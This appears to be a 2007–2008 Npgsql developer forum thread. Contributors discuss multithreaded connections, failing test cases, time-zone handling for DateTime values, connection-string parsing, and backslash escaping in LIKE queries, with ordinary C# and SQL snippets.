My initial design has several web scrapers, running in separate threads, each with their own database connection. They simply post data to various tables so I shouldn't have interlock problems between threads. The main thread will periodically read the database to check on the worker's progress.
I understand a single database connection is not thread safe but are there any problems with independent connections on independent threads?
Regards,
Carl
RE: multiple threads with independent connections
[ reply ]
By:
Francisco Figueiredo jr.
on 2008-01-02 17:24
[forum:1002967]
Hi, Carl!
No, there is no problem. Indeed, this is the right way of using it: a connection per thread. We had some issues in the past with multithreading, but they are fixed now.
Let us know if you have any problems with it.
Thanks for your interest in Npgsql!
RE: multiple threads with independent connect
[ reply ]
By:
Carl Strange
on 2008-01-02 18:16
[forum:1002968]
Francisco,
Thanks for your speedy response. If I run into any problems I'll certainly ask questions. Meanwhile it's nice to know I'm on the right track.
Carl
I got 8 testcases failed.
[ reply ]
By:
Tao Wang
on 2007-11-30 08:20
[forum:1002893]
Every time I run the test suite, I get 8 test cases failing. After I dug into it, it looks like some test cases are wrong. The following is the test result:
------ Test started: Assembly: NpgsqlTests.dll ------
TestCase 'NpgsqlTests.CommandTests.DateTimeSupportTimezone'
failed:
String lengths are both 20. Strings differ at index 11.
Expected: "2002-02-02 16:00:23Z"
But was: "2002-02-02 09:00:23Z"
----------------------^
F:\dev\Npgsql2\testsuite\noninteractive\NUnit20\CommandTests.cs(941,0): at NpgsqlTests.CommandTests.DateTimeSupportTimezone()
TestCase 'NpgsqlTests.CommandTests.DateTimeSupportTimezone2'
failed:
Expected string length 20 but was 16. Strings differ at index 5.
Expected: "2002-02-02 16:00:23Z"
But was: "2002-2-2 9:00:23"
----------------^
F:\dev\Npgsql2\testsuite\noninteractive\NUnit20\CommandTests.cs(951,0): at NpgsqlTests.CommandTests.DateTimeSupportTimezone2()
TestCase 'NpgsqlTests.CommandTests.FunctionReturnVoid'
failed: Npgsql.NpgsqlException : ERROR: 42883: function test(integer)(463,0): at Npgsql.NpgsqlCommand.ExecuteNonQuery()
F:\dev\Npgsql2\testsuite\noninteractive\NUnit20\CommandTests.cs(651,0): at NpgsqlTests.CommandTests.FunctionReturnVoid()
TestCase 'NpgsqlTests.CommandTests.LastInsertedOidSupport'
failed: Npgsql.NpgsqlException : ERROR: 42703: column "oid"(706,0): at Npgsql.NpgsqlCommand.ExecuteScalar()
F:\dev\Npgsql2\testsuite\noninteractive\NUnit20\CommandTests.cs(1969,0): at NpgsqlTests.CommandTests.LastInsertedOidSupport()
TestCase 'NpgsqlTests.CommandTests.ListenNotifySupport' failed: System.InvalidOperationException was expected
TestCase 'NpgsqlTests.CommandTests.ParametersGetName'
failed:
Expected string length 10 but was 11. Strings differ at index 0.
Expected: "Parameter4"
But was: ":Parameter4"
-----------^
F:\dev\Npgsql2\testsuite\noninteractive\NUnit20\CommandTests.cs(73,0): at NpgsqlTests.CommandTests.ParametersGetName()
TestCase 'NpgsqlTests.DataAdapterTests.UpdateWithDataSet'
failed: System.InvalidOperationException : Dynamic SQL generation for the UpdateCommand is not supported against a SelectCommand that does not return any key column information
at System.Data.Common.DbDataAdapter.UpdatingRowStatusErrors(RowUpdatingEventArgs rowUpdatedEvent, DataRow dataRow)(DataSet dataSet, String srcTable)
at System.Data.Common.DbDataAdapter.Update(DataSet dataSet)
F:\dev\Npgsql2\testsuite\noninteractive\NUnit20\DataAdapterTests.cs(212,0): at NpgsqlTests.DataAdapterTests.UpdateWithDataSet()
TestCase 'NpgsqlTests.DataReaderTests.SingleRowCommandBehaviorSupportFunctioncallPrepare'
failed:
Expected: 1
But was: 6
F:\dev\Npgsql2\testsuite\noninteractive\NUnit20\DataReaderTests.cs(530,0): at NpgsqlTests.DataReaderTests.SingleRowCommandBehaviorSupportFunctioncallPrepare()
162 passed, 8 failed, 0 skipped, took 20.45 seconds.
===================================
For NpgsqlTests.CommandTests.FunctionReturnVoid, there is no test() function in the test db, and none in add_functions.sql (should it be testreturnvoid()?).
For NpgsqlTests.CommandTests.ParametersGetName, I think ":Parameter4" is correct; why expect "Parameter4"? Is the test wrong?
Should we correct those testcases?
RE: I got 8 testcases failed.
[ reply ]
By:
Francisco Figueiredo jr.
on 2007-12-03 13:20
[forum:1002901]
I'm checking that.
One thing I can note now is that the "Dynamic SQL ..." message seems to be thrown only on Mono. If you test it on Windows, you will see it works. At least it worked the last time I tried. :)
The parameter4 problem is that when I add it to the Parameters collection, I don't put the : prefix. So, when I try to get its name, I would expect it to come back without the : prefix, but Npgsql adds it. I didn't check SqlClient's behavior to see whether, if you add a parameter without the @ prefix, it returns the parameter name with @ anyway. That's why I left this test case failing: to remind me of that. :)
The others for sure we need to fix.
RE: I got 8 testcases failed.
[ reply ]
By:
Tao Wang
on 2007-12-04 04:12
[forum:1002904]
For Dynamic SQL, I ran the test on Windows, so maybe something is wrong there.
For ":" prefix, I did a test by following code on SqlClient:
-=================== Begin ==================-
// Sql
SqlCommand sql_command = new SqlCommand();
sql_command.Parameters.Add(new SqlParameter("Parameter1", DbType.DateTime));
sql_command.Parameters.Add(new SqlParameter("@Parameter2", DbType.DateTime));
Console.WriteLine("1:[Parameter1],\t 2:[@Parameter2]");
Console.WriteLine("sql_command.Parameters[0].ParameterName = '{0}'.", sql_command.Parameters[0].ParameterName);
Console.WriteLine("sql_command.Parameters[1].ParameterName = '{0}'.", sql_command.Parameters[1].ParameterName);
//Console.WriteLine("sql_command.Parameters[\"@Parameter1\"].ParameterName = '{0}'.", sql_command.Parameters["@Parameter1"].ParameterName);
//Console.WriteLine("sql_command.Parameters[\"Parameter2\"].ParameterName = '{0}'.", sql_command.Parameters["Parameter2"].ParameterName);
-=================== End ==================-
The output is :
-=================== Begin ==================-
1:[Parameter1], 2:[@Parameter2]
sql_command.Parameters[0].ParameterName = 'Parameter1'.
sql_command.Parameters[1].ParameterName = '@Parameter2'.
-=================== End ==================-
I commented out the last 2 lines since they raise an IndexOutOfRangeException stating there is no such name. I think SqlParameter just treats the name as a normal string, without handling the "@" prefix, even though "@param" actually references the same parameter as "param".
But while the SqlCommand is being executed, the "@" prefix is attached to the name dynamically before it is sent to the server. So on the server side, the parameter always arrives with the "@" prefix attached. I didn't test it on Mono, but I read the Mono source code for Mono.Data.Tds.TdsMetaParameter.cs:
It looks like it has the same behavior: the "@" is attached dynamically if it's missing, and TdsMetaParameterCollection doesn't handle the "@" prefix.
I did the same test on MySql.Data by following code:
-=================== Begin ==================-
MySqlCommand mysql_command = new MySqlCommand();
mysql_command.Parameters.Add(new MySqlParameter("Parameter1", DbType.DateTime));
mysql_command.Parameters.Add(new MySqlParameter("?Parameter2", DbType.DateTime));
Console.WriteLine("1:[Parameter1],\t 2:[?Parameter2]");
Console.WriteLine("mysql_command.Parameters[0].ParameterName = '{0}'.", mysql_command.Parameters[0].ParameterName);
Console.WriteLine("mysql_command.Parameters[1].ParameterName = '{0}'.", mysql_command.Parameters[1].ParameterName);
Console.WriteLine("mysql_command.Parameters[\"?Parameter1\"].ParameterName = '{0}'.", mysql_command.Parameters["?Parameter1"].ParameterName);
//Console.WriteLine("mysql_command.Parameters[\"Parameter2\"].ParameterName = '{0}'.", mysql_command.Parameters["Parameter2"].ParameterName);
-=================== End ==================-
The output is :
-=================== Begin ==================-
1:[Parameter1], 2:[?Parameter2]
mysql_command.Parameters[0].ParameterName = 'Parameter1'.
mysql_command.Parameters[1].ParameterName = '?Parameter2'.
mysql_command.Parameters["?Parameter1"].ParameterName = 'Parameter1'.
-=================== End ==================-
The last line of code, which I commented out, raises an ArgumentException with the message "Parameter 'Parameter2' not found in the collection.".
MySqlParameter doesn't handle the "?" prefix either; it keeps the parameter name in its original form. The only difference is that MySqlParameterCollection can handle a name with the "?" prefix: if the search fails, it searches again for the name without "?".
RE: I got 8 testcases failed.
[ reply ]
By:
Tao Wang
on 2007-12-04 16:04
[forum:1002908]
For Dynamic SQL (TestCase 'NpgsqlTests.DataAdapterTests.UpdateWithDataSet'), I found the reason is that there is no primary key on tableB. The case passed once I added a primary key on 'field_serial'. Should we modify the SQL?
For TestCase 'NpgsqlTests.CommandTests.FunctionReturnVoid', I replaced 'test(:a)' with 'testreturnvoid()'.
For TestCase 'NpgsqlTests.CommandTests.LastInsertedOidSupport', should we add oid to the table in add_table.sql? Otherwise there is no oid, and it seems the test should always fail.
About 2 test cases fail because they test against the exception message using a literal string rather than the resource file. I did a test using the resource file instead, and the 2 test cases passed.
For TestCase 'NpgsqlTests.CommandTests.DateTimeSupportTimezone', and TestCase 'NpgsqlTests.CommandTests.DateTimeSupportTimezone2',
I have thought about the timezone issue. I think we can fix these with a small amount of code; the only question is what behavior we expect.
First, How should we handle datetime string from server, if the field is datetime with timezone, and we want to insert a value to server, there are 3 cases:
1. DateTime with Kind == UTC
I think we should use DateTime.ToString("u"), since that format is an ISO standard and has "Z" attached to specify that the value is a UTC value.
2. DateTime with Kind == Local
We have 2 choices here. One is using the current format,
ToString("yyyy-MM-dd HH:mm:ss.ffffff")
which removes the local offset info, treats the value just as a DateTime without timezone, and leaves the decision to the server (which actually uses the server's 'timezone' setting as the default timezone for the input).
Another option is using:
ToString("yyyy-MM-dd HH:mm:ss.ffffffzz")
where "zz" is the offset of the current system timezone. I think the second way, with "zz", is right: there actually is timezone info, so we should not ignore it. Especially since we sometimes use DateTime.Now to get the current time, and that value is the current time in the system's local time zone.
3. DateTime with Kind == Unspecified.
For this case, we may want to leave the decision to the server, since there is no timezone information. If so, we cannot use the format "yyyy-MM-dd HH:mm:ss.ffffffzz", since "zz" would be the offset of the current system's local timezone even though the value's Kind is not Local.
How should we treat a value without timezone in this case? (Just submit it? Submit as local? Submit as UTC?)
Second, How to parse the string from server?
For example, we get the string with timezone, such as
2002-02-02 09:00:23.345+5
The result of DateTime.ParseExact() depends on the DateTimeStyles value. Npgsql currently uses None, which converts the above time to the local timezone; on my system (+11) that will be
2002-02-02 15:00:23.345+11
Actually we have 3 options for the result:
1. Convert the time to UTC, which would be:
2002-02-02 04:00:23.345Z
This way is reasonable, since it will make all time related code easy to handle. I think this is better.
2. Convert the time to Local time, which is the current way. I don't think it's correct, since the local timezone may vary.
3. Never convert the time: use the original value and set Kind to Unspecified. This keeps the value identical to the string. However, since a .NET DateTime doesn't carry any timezone info except UTC and Local, the timezone is lost, and we will have problems when writing the value back to the database. (Use the system's local timezone? The database server's? UTC?)
If we can clear the behavior, the implementation should not be hard to do.
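By analogy, the three parsing options for a value like 2002-02-02 09:00:23.345+5 can be sketched in Python (an illustration only, not Npgsql code; the +11 local zone is pinned so the example is reproducible):

```python
from datetime import datetime, timezone, timedelta

# The server sends a timestamp carrying an explicit +5 offset.
raw = datetime(2002, 2, 2, 9, 0, 23, 345000,
               tzinfo=timezone(timedelta(hours=5)))

# Option 1: normalize to UTC -- every value is comparable afterwards.
as_utc = raw.astimezone(timezone.utc)
print(as_utc)          # 2002-02-02 04:00:23.345000+00:00

# Option 2: convert to the client machine's local zone (pinned to +11
# here) -- the result varies from machine to machine.
local = timezone(timedelta(hours=11))
as_local = raw.astimezone(local)
print(as_local)        # 2002-02-02 15:00:23.345000+11:00

# Option 3: keep the original value and its offset untouched.
print(raw)             # 2002-02-02 09:00:23.345000+05:00
```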
RE: I got 8 testcases failed.
[ reply ]
By:
Tao Wang
on 2007-12-04 16:09
[forum:1002909]
Sorry.
-=======-
First, How should we handle datetime string from server...
-=======-
should be
-=======-
First, How should we handle datetime to string during submit the command to server...
-=======-
RE: I got 8 testcases failed.
[ reply ]
By:
Francisco Figueiredo jr.
on 2007-12-04 18:48
[forum:1002911]
Hi, Tao! Thanks for investigating those errors.
Please, send me your patches for the first corrections.
About datetime, I think we could stick with using UTC when sending and receiving data. It won't be perfect, but at least it won't be wrong either. If this isn't enough, I think we could create a custom type to add support for timezones, since the .NET native type doesn't support timezones other than UTC and local, as Tao said.
What do you all think?
RE: I got 8 testcases failed.
[ reply ]
By:
Francisco Figueiredo jr.
on 2007-12-04 18:52
[forum:1002912]
Hi, Tao!
I added a pointer to this discussion on our mail list. Are you subscribed to npgsql-devel@pgfoundry.org? If not, please do it.
This discussion will be kept here, but others may appear in mail list and if you are subscribed you can follow them.
Thanks in advance.
RE: I got 8 testcases failed.
[ reply ]
By:
Tao Wang
on 2007-12-05 03:18
[forum:1002915]
Thanks for the pointer; I've subscribed now.
About the test case 'DateTimeSupportTimezone2()': what is its intention? The case uses Command.ExecuteScalar().ToString() to get the string. I think the result is culture-dependent, so the test case will not always pass. Is there any special intention behind putting this case here?
RE: I got 8 testcases failed.
[ reply ]
By:
Francisco Figueiredo jr.
on 2007-12-05 18:49
[forum:1002923]
Whoops, my fault.
This was a throwaway test case I used to see if I could get some ideas for handling timezone datetime values. You can discard it.
Sorry for that.
RE: I got 8 testcases failed.
[ reply ]
By:
Tao Wang
on 2007-12-05 06:04
[forum:1002917]
I created a patch fixing the test cases.
Patch link:
And could you also apply the following patch? It adds an NUnit 2.0 test project and includes it in the VS solution file.
Patch link:
RE: I got 8 testcases failed.
[ reply ]
By:
Josh Cooley
on 2007-12-05 04:44
[forum:1002916]
I agree. About the only thing you can do with the DateTime data type and expect it to be correct is to use UTC.
We could support provider specific types to help with the timezone problem. .NET 3.5 has better support for timezones with DateTimeOffset and TimeZoneInfo. The provider could have conversion functions to the 3.5 types when using a 3.5 version.
My only concern is with data binding. If a developer uses timestamp with timezone and expects it to remain local, they will be in for a surprise when they display the DateTime in the UI.
RE: I got 8 testcases failed.
[ reply ]
By:
Francisco Figueiredo jr.
on 2007-12-05 18:53
[forum:1002924]
+1.
I think the provider specific type is one good solution. With it we can work with those different support in framework versions as Josh said.
Also, as Tao said later, if we put it in our manual, users will know what is expected. If there is need for other expectations, we can work on them. Maybe we could add an entry on connection string to tell Npgsql how to deal with timezones.
RE: I got 8 testcases failed.
[ reply ]
By:
Tao Wang
on 2007-12-05 07:11
[forum:1002918]
I think putting a notice in the manual might be a good solution if we use DateTime and stick to UTC. At least the logic will never break if we use UTC.
There might be another way: add a property that lets the developer specify which time they want (local/UTC) before the command is executed, and we convert the value to the specified kind during conversion.
I agree with using DateTimeOffset. Even though it's not great (it cannot handle the daylight-saving problem, and you cannot use it for time calculations when a daylight-saving timezone is involved), it is still much better than the current DateTime.
I checked my MSDN library; it says the DateTimeOffset struct is supported in: 3.5, 3.0 SP1, 2.0 SP1. 2.0 SP1 is a little tricky; I got it only during the installation of VS2008. Is there any automatic update that will bring the .NET 2.0 framework up to 2.0 SP1? Mono treats DateTimeOffset as a NET_2_0 feature, but it hasn't been implemented yet. So which target .NET version should we put this feature in? .NET 2.0? .NET 3.5?
RE: I got 8 testcases failed.
[ reply ]
By:
Tao Wang
on 2007-12-05 08:11
[forum:1002919]
I created a patch that uses DateTime.Kind to stick to UTC. It looks OK; at least it passes the test cases. There are only 2 behaviors I am not clear on.
During conversion from a DateTime to a PostgreSQL timestamp-with-timezone string, if the DateTime value's Kind == Unspecified, what should we do?
1. Using "yyyy-MM-dd HH:mm:ss.ffffff" format and leave the problem to server?
2. Treat Unspecified DateTime as local, and convert it to UTC, and submit?
3. Treat Unspecified DateTime as UTC, using "u" to submit to server?
I think the first would be better; however, the insert result will then depend on the server's current runtime variable 'timezone', so on the client side the developer will never know the real result. If we do so, we might need to put a notice in the manual.
During parsing of a string from the server, if there is no timezone information attached and it's a timestamp-with-time-zone value: is that possible? If it is, what should we do?
1. Treat the time as UTC.
2. Treat the time as system local timezone(NOTE, not server current local timezone!).
3. Return a DateTime with Unspecified Kind.
I also tried DateTimeOffset (NET35) and found a problem: if we use DateTimeOffset to map timestamp with timezone in .NET 3.5, we get an inconsistent API. That is, a project that runs correctly with the Npgsql .NET 2.0 version might not be able to run with the Npgsql .NET 3.5 version.
The problem is that in .NET 2.0 Npgsql, a timestamp-with-timezone field returns a DateTime object, while in .NET 3.5 the field would return a DateTimeOffset object; DateTimeOffset does not inherit from DateTime, so the program will get an invalid cast exception if it tries to cast to DateTime. How do we handle this?
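The Kind distinction under discussion maps roughly onto Python's naive/aware datetimes (a hedged analogy, not Npgsql's implementation): a value with Kind == Unspecified behaves like a naive datetime, and the driver must pick one of the debated policies for it.

```python
from datetime import datetime, timezone, timedelta

aware = datetime(2007, 12, 5, 8, 0, tzinfo=timezone(timedelta(hours=11)))
naive = datetime(2007, 12, 5, 8, 0)   # ~ DateTime with Kind == Unspecified

# Offset known: it is always safe to normalize to UTC before sending.
print(aware.astimezone(timezone.utc))         # 2007-12-04 21:00:00+00:00

# Offset unknown: the driver has to choose one of the debated options.
send_as_is  = naive.isoformat(sep=" ")            # submit as-is, server decides
send_as_utc = naive.replace(tzinfo=timezone.utc)  # declare the value to be UTC
print(send_as_is)                             # 2007-12-05 08:00:00
print(send_as_utc.isoformat(sep=" "))         # 2007-12-05 08:00:00+00:00
```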
RE: I got 8 testcases failed.
[ reply ]
By:
Josh Cooley
on 2007-12-05 14:27
[forum:1002921]
I agree that sending a date time to the server should convert to UTC unless the Kind is Unspecified. In that case we should leave it up to the server (choice 1).
I think we should try to get timezone information back from the server. If that's not possible, then I think we have to say that the DateTime.Kind is again Unspecified (choice 3).
You are right in that we can't change the type from 2.0 to 3.5. But we can provide a provider specific type that has conversion methods to go from "NpgsqlDateTime" to System.DateTime and System.DateTimeOffset.
RE: I got 8 testcases failed.
[ reply ]
By:
Francisco Figueiredo jr.
on 2007-12-05 19:05
[forum:1002925]
Hmmmm, I think we should stick to UTC even if the kind is Unspecified, shouldn't we? That way users will know that we always treat the datetime timezone as UTC unless otherwise specified (like when explicitly setting the kind to Local).
What do you think?
When receiving data from the server, I think that when the field is created with timezone, the values from the server will always carry timezone information. If not, I think we should always treat them as being in UTC. For example, datetime fields created without timezone we would treat as UTC, wouldn't we?
Please, correct me if I'm wrong. I may be missing something.
RE: I got 8 testcases failed.
[ reply ]
By:
David Bachmann
on 2007-12-18 14:36
[forum:1002957]
>2.0 SP1 is a little bit tricky, I got it only during the installation of VS2008.
>Is there any automatic update will update .net 2.0 framework to 2.0 sp1?
Yes, Microsoft provides an installer for updating .NET 2.0 to .NET 2.0 SP1:
Cannot connect to database (Npgsql)
[ reply ]
By:
Chris Miles
on 2007-12-11 15:12
[forum:1002939]
I have just installed Npgsql (stable), and I am having problems connecting to my database.
This is the code I am using:
NpgsqlConnection conn = new NpgsqlConnection("Server=192.168.0.50;Port=5432;User Id=cakeinaboxadmin;Password=cakeinaboxadmin;Database=cakeinabox;");
conn.Open();
Ip and port is valid - I can connect with pgadmin to the database without any problems.
An exception is thrown on the conn.Open() line:
"Unable to read data from the transport connection: An existing connection was forcibly closed by the remote host."
Full exception trace as follows:
Thanks
Chris
RE: Cannot connect to database (Npgsql)
[ reply ]
By:
Josh Cooley
on 2007-12-12 05:25
[forum:1002940]
I'm not sure what the circumstances are that would cause this error. You definitely got the initial socket connection established. It appears the PostgreSQL disconnected your client after receiving the startup packet.
Check your PostgreSQL configuration to see if you've disallowed certain types of connections. (maybe you only allow SSL)
RE: Cannot connect to database (Npgsql)
[ reply ]
By:
Chris Miles
on 2007-12-12 15:33
[forum:1002941]
Thanks.
The database is set up to allow all connections.
Chris
RE: Cannot connect to database (Npgsql)
[ reply ]
By:
Jon Hanna
on 2007-12-12 18:01
[forum:1002943]
Try disallowing SSL, and then trying again.
"An existing connection was forcibly closed by the remote host." is an exception that gets raised at the socket level. There's a large number of possible causes, many of which have nothing to do with either PostgreSQL or Npgsql (which is unfortunate in a way as it makes them all the harder to debug), but a common one is issues with SSL certificates.
If disallowing SSL fixes the problem, then we'll know that's where the problem is, and can look at fixing that so you can allow SSL again.
If disallowing SSL doesn't fix the problem, then we'll still know that's not where the problem is, so at least that'll be something :)
Badly formed XML comments in npgsql.xml
[ reply ]
By:
Andrus Moor
on 2007-11-11 20:08
[forum:1002815]
npgsql.xml contains a lot of messages like
<!-- Badly formed XML comment ignored for member "P:Npgsql.NpgsqlConnection.ConnectionString" -->
<!-- Badly formed XML comment ignored for member "M:Npgsql.NpgsqlConnection.GetSchema" -->
RE: Badly formed XML comments in npgsql.xml
[ reply ]
By:
Josh Cooley
on 2007-11-12 05:38
[forum:1002816]
I've found the same thing using visual studio. It doesn't like the newlines between comment sections. Nothing is wrong with the xml, just the comment parser. I can't remember if I committed a fix for that or not. My npgsql work is at home, and I'm away for the week.
RE: Badly formed XML comments in npgsql.xml
[ reply ]
By:
Jon Hanna
on 2007-12-10 12:54
[forum:1002931]
I've submitted two patches that deal with this (1010213 for the .NET1.x build and 1010215 which has .NET2.0 versions of the bunch of .NET1.x patches I submitted in one patch).
Mostly it was just newlines which break up the /// block and parsers don't like. There was a handful of bad tags too.
Login as Administrator
[ reply ]
By:
Vital Logic
on 2007-12-08 07:02
[forum:1002929]
I want to create a database from my application, using Npgsql. However, the connection string explicitly needs a database to be passed as a parameter. How can I solve this?
Similar is the case with creating users from the application.
RE: Login as Administrator
[ reply ]
By:
Francisco Figueiredo jr.
on 2007-12-08 14:29
[forum:1002930]
Hi, Vital!
You should use the template1 database. There you can create other databases and users.
I hope it helps!
Npgsql sync notifications. How?
[ reply ]
By:
Dmitry Nizinkin
on 2007-10-29 08:52
[forum:1002787]
Hi, I have Win XP SP2, PostgreSQL 8.2.0, and the Npgsql 1.0 data provider.
I need to receive a notify from the PostgreSQL server when a row is added to a table on the server. I wrote a trigger on insert; in the body of this trigger I write: notify MyApp.
In my application do:
npgsqlconnection+=new EventHandler(func);
It works, but asynchronously. My app receives the message only when I send the next command to the server. How can my application receive the message immediately? Please help me.
[ reply ]
By:
Sean Zeng
on 2007-12-03 18:05
[forum:1002902]
Hi,
I ran into a weird problem when saving a string with a backslash and then searching for it.
1. I wrote two PG stored procedures, one to insert a string, one to retrieve it.
a. FUNCTION proc_add_value(i_value text) as:
INSERT INTO TEST_DATA (NAME) VALUES(I_VALUE);
b. FUNCTION proc_find_value(i_value text) as:
FOR O_NAME IN SELECT NAME FROM TEST_DATA WHERE UPPER(NAME) LIKE UPPER(I_VALUE) || '%'
LOOP
RETURN NEXT O_NAME;
END LOOP;
2. In C#, call the stored procedures through npgsql:
a. call proc_add_value with string parameter of @"HKLM\Software\test"
I can see the record is added correctly in pgadmin.
b. call proc_find_value with string parameter of @"HKLM\Software"
No record is returned.
c. call proc_find_value with string parameter of @"HKLM\\Software" (noted that there are two back slashes in the string)
The record of "HKLM\Software\test" is returned.
-------------
In summary, I inserted @"HKLM\Software\test" but need to pass in @"HKLM\\Software" (double back slash) to find it. It seems strange to me.
Do I miss anything?
Thanks!
Sean
RE: search for string with back slash
[ reply ]
By:
Tao Wang
on 2007-12-04 05:10
[forum:1002905]
9.7. Pattern Matching
9.7.1. LIKE
...
Note that the backslash already has a special meaning in string literals, so to write a pattern constant that contains a backslash you must write two backslashes in an SQL statement (assuming escape string syntax is used).
...
So, modify the function to:
FUNCTION proc_find_value(i_value text) as:
FOR O_NAME IN SELECT NAME FROM TEST_DATA WHERE UPPER(NAME) LIKE UPPER(I_VALUE) || '%' ESCAPE ''
LOOP
RETURN NEXT O_NAME;
END LOOP;
should work.
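Alternatively, the doubling the manual describes can be done on the client side before the value reaches the LIKE pattern. A Python illustration (the function name is made up for the example; this is not the original C# code):

```python
def escape_like_backslashes(value):
    """Double each backslash so that, after string-literal processing,
    LIKE still sees a literal backslash in the pattern."""
    return value.replace("\\", "\\\\")

print(escape_like_backslashes(r"HKLM\Software"))   # HKLM\\Software
```

Escaping % and _ as well would make the value fully literal for LIKE.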
RE: search for string with back slash
[ reply ]
By:
Sean Zeng
on 2007-12-04 21:30
[forum:1002913]
Great, it works fine. Now the C# code is consistent and looks much better :-)
A few questions about Npgsql2
[ reply ]
By:
Tao Wang
on 2007-11-28 16:43
[forum:1002874]
1. I think "CLASSNAME" in each class is not necessary, we can use "this.GetType().Name" instead. Am I missing anything here?
2. The Mono.Security reference is used for SSL connection. But .Net Framework 2.0 already implement SslStream, is that possible to eliminate Mono.Security dependence by using System.Net.Security.SslStream? And same thing for MD5, maybe using System.Security.Cryptography.MD5 is more natural for .Net 2.0. There are some classes or functions seems could be simplified by taking advantage of .Net 2.0 framework.
3. The recent updated test case for Connection:
[Test]
[ExpectedException(typeof(NpgsqlException))]
public void ConnectionStringWithSemicolonSignValue()
{
NpgsqlConnection conn = new NpgsqlConnection("Server=127.0.0.1;Port=44444;User Id=npgsql_tets;Password='j;'");
conn.Open();
}
I don't understand this case. Should we throw an exception here?
If yes, how do we write a connection string whose password contains a semicolon?
4. Missing 3 methods, 1 property in NpgsqlFactory.
public virtual bool CanCreateDataSourceEnumerator { get; }
public virtual DbConnectionStringBuilder CreateConnectionStringBuilder();
public virtual DbDataSourceEnumerator CreateDataSourceEnumerator();
public virtual CodeAccessPermission CreatePermission(PermissionState state);
They are new in .Net 2.0.
5. Maybe we should implement a class NpgsqlConnectionStringBuilder that inherits from DbConnectionStringBuilder, to replace NpgsqlConnectionString. They are really similar, and some of what NpgsqlConnectionString does is already done in DbConnectionStringBuilder.
6. Maybe we should have a look at LINQ; there is some code implementing LINQ to SQL for PostgreSQL using Npgsql:
It's MIT licensed. Is it possible for Npgsql to merge the code from that project so Npgsql supports LINQ directly? Or have a sub-project do it?
7. Npgsql doesn't seem well supported in Visual Studio's design mode, at least not as well as MySQL.Data. Could that part be improved?
Thanks.
Tao Wang.
RE: A few questions about Npgsql2
[ reply ]
By:
Francisco Figueiredo jr.
on 2007-11-28 18:25
[forum:1002878]
1. I think it is ok to use getType().Name.
2. We have a request about that. I think it is ok too. I was thinking about using Mono.Security because it is maintained by Sebastien Pouliot from Mono project. But if we see we can use existing framework implementation, I think we can use it. As on Mono, it will still use Sebastien's implementation.
3. The intention of this test is to throw the exception due to "connection refused", because the port isn't the default. If this connection string parses, the exception will be thrown by the Open() method. You can use a semicolon the same way it is shown here, with the value enclosed in single or double quotes.
4. Patches are welcome!
5. Patches are welcome!
6. Yeah, this would be great! I was pointed to this site when I was talking about Npgsql on Mono project. It would be very nice if we could release Npgsql with this add on project.
7. Yes. We have plans to integrate this. One of the reasons for changing the license was also to ease the process of adding this support, because of license restrictions on VS.NET design-support code.
RE: A few questions about Npgsql2
[ reply ]
By:
Tao Wang
on 2007-11-28 16:49
[forum:1002875]
One more question about ParsingConnectionString(): could we avoid using a regular expression here? I tried to write the code below, and it looks OK. (The only exception is handling a "value" that contains a semicolon, which will not be parsed correctly, but that can be fixed by adding a few lines of code.) Can Npgsql use similar code for this? Or, by inheriting from DbConnectionStringBuilder, we could use the existing function to parse the connection string directly without writing any code for this.
======================================================================================
if (!string.IsNullOrEmpty(CS))
{
string[] items = CS.Split(";".ToCharArray());
foreach (string item in items)
{
string[] keyvalue = item.Split("=".ToCharArray());
if (keyvalue.Length == 2)
{
// Key
string key = keyvalue[0].Trim().ToUpperInvariant();
// Substitute the real key name if this is an alias key (ODBC stuff for example)...
string alias_key = (string)ConnectionStringKeys.Aliases[key];
if (!string.IsNullOrEmpty(alias_key))
{
key = alias_key;
}
// Value
string value = keyvalue[1].Trim();
if (value.StartsWith("\"") && value.EndsWith("\""))
{
value = value.Substring(1, value.Length - 2).Trim();
}
else if (value.StartsWith("'") && value.EndsWith("'"))
{
value = value.Substring(1, value.Length - 2).Trim();
}
// Check quote pair (open should always come with close)
if ((value.StartsWith("\"") && !value.EndsWith("\""))
|| (!value.StartsWith("\"") && value.EndsWith("\""))
|| (value.StartsWith("'") && !value.EndsWith("'"))
|| (!value.StartsWith("'") && value.EndsWith("'"))
)
{
throw new ArgumentException(resman.GetString("Exception_WrongKeyVal"), key);
}
newValues.Add(key, value);
}
else
{
if (keyvalue.Length > 1)
{
if (keyvalue[0].Trim().Length > 0)
{
throw new ArgumentException(resman.GetString("Exception_WrongKeyVal"), keyvalue[0].Trim());
}
else
{
throw new ArgumentException(resman.GetString("Exception_WrongKeyVal"), "<BLANK>");
}
}
else
{
throw new ArgumentException(resman.GetString("Exception_WrongKeyVal"), "<INVALID>");
}
}
}
}
======================================================================================
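For illustration only, the same split-on-semicolon idea reads like this in Python. It shares the C# sketch's stated limitation: a semicolon inside a quoted value is not handled.

```python
def parse_connection_string(cs):
    """Naive 'Key=Value;...' parser mirroring the sketch above.
    Values may be wrapped in a matching pair of single or double quotes."""
    values = {}
    for item in filter(None, (part.strip() for part in cs.split(";"))):
        key, sep, value = item.partition("=")
        if not sep or not key.strip():
            raise ValueError("malformed key/value pair: %r" % item)
        key, value = key.strip().upper(), value.strip()
        if len(value) >= 2 and value[0] == value[-1] and value[0] in "'\"":
            value = value[1:-1].strip()        # strip a matched quote pair
        elif value[:1] in ("'", '"') or value[-1:] in ("'", '"'):
            raise ValueError("unbalanced quotes in value: %r" % value)
        values[key] = value
    return values

print(parse_connection_string("Server=127.0.0.1; Port=5432; Password='j'"))
# {'SERVER': '127.0.0.1', 'PORT': '5432', 'PASSWORD': 'j'}
```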
RE: A few questions about Npgsql2
[ reply ]
By:
Francisco Figueiredo jr.
on 2007-11-28 18:36
[forum:1002879]
+1 to inherit from dbconnectionstringbuilder.
This way we need to maintain less code and reuse existing one.
RE: A few questions about Npgsql2
[ reply ]
By:
Tao Wang
on 2007-11-29 12:33
[forum:1002887]
For NpgsqlConnectionStringBuilder, I submitted a patch. This patch adds an NpgsqlConnectionStringBuilder class to replace the NpgsqlConnectionString class, and also adds caching for connection-string parsing. It passes the Npgsql test suite.
Patch link:
RE: A few questions about Npgsql2
[ reply ]
By:
Francisco Figueiredo jr.
on 2007-11-29 18:13
[forum:1002889]
Thanks Tao.
I'm working on it.
As soon as I apply your patches I will let you know.
Thanks for your feedback and support.
RE: A few questions about Npgsql2
[ reply ]
By:
Francisco Figueiredo jr.
on 2007-12-02 18:11
[forum:1002898]
Hi, Tao!
Patch applied! Thanks very much! And keep the good work!
RE: A few questions about Npgsql2
[ reply ]
By:
Tao Wang
on 2007-12-03 04:12
[forum:1002899]
Hi, Francisco,
